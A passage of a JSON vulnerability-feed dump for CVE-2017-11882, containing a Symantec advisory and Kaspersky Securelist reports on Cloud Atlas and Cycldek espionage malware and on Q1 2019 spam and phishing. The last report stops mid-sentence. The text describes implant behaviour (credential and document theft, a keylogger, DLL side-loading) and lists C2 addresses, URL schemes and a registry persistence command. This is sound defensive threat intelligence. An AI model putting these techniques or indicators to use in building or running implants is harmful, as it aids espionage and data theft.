"bulletinFamily": "software", "cvelist": ["CVE-2017-11882"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101757", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101757", "type": "symantec", "title": "Microsoft Office CVE-2017-11882 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2019-08-12T19:33:22", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "modified": "2019-08-12T10:00:58", "published": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "type": "securelist", "title": "Recent Cloud Atlas activity", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. **12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "modified": "2019-05-15T10:00:23", "published": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "type": "securelist", "title": "Spam and phishing in Q1 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures 